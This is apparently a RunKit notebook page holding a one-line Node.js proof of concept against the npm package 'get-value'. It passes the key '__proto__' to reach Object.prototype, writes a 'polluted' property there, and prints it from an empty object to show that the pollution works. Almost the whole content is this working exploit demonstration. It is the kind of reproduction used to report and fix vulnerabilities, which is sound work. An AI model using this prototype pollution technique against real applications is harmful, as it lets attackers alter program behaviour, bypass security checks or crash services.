RunKit + npm:

node v10.24.1
endpointsharetweet
const get = require('get-value'); const key = "__proto__"; const entry = get({}, key); entry.hello = "polluted"; console.log({}.hello);
Created from: https://npm.runkit.com/
Loading…